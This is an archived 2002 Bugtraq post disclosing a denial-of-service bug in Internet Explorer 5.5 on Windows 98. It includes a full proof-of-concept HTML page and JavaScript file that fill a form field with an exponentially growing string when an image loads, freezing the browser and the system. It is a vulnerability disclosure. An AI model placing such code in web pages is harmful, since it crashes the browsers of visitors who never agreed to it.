[23870] in bugtraq
IE FORM DOS
daemon@ATHENA.MIT.EDU (Ivan Sergio Borgonovo)
Wed Jan 16 03:00:45 2002
From: "Ivan Sergio Borgonovo" <mail@gorilla.it>
To: BUGTRAQ@securityfocus.com
Date: Tue, 15 Jan 2002 01:11:10 +0100
Message-ID: <3C4381AE.13487.1AC142@localhost>
I was testing in a lame way whether an IIS app could be attacked by sending
a long POST, and I realized IE is sensitive to huge amounts of data in
<INPUT... > and <TEXTAREA> fields (maybe also others like SELECT).
Since nobody is willing to download a 10Mb page, I just thought I could
fill the VALUE="" attribute with JavaScript.
-- begin test.html --
<html><title></title>
<body>
<script language="JavaScript" src="t.js"></script>
<FORM NAME="IEDos" METHOD="POST" ACTION="./">
<IMG SRC="1.gif" width='10' height='10' border='0'
onLoad="FillTA(TA)">
<input type="text" name="TA" value="">
</FORM>
</body>
</html>
-- end test.html --
-- begin t.js --
<!--
function FillTA(obj) {
v="a";
for(i=0;i<100000000;i++) {
v=v+v;
};
obj.value=v;
return;
}
//-->
-- end t.js --
IE freezes, and if you have a few secs of patience the system freezes too.
IE 5.5 on W98 (I hope fully patched).
Commenting out obj.value=v, IE survives.
I've observed some protection errors too, but only occasionally.
I hope this is not old news.
--
Ivan Sergio Borgonovo
Webmaster Gorilla.it http://www.gorilla.it
Tel. +39 02 26149225/26149008 Fax. +39 02 26149657
Via d'Apulia 11, 20125 Milano, Italy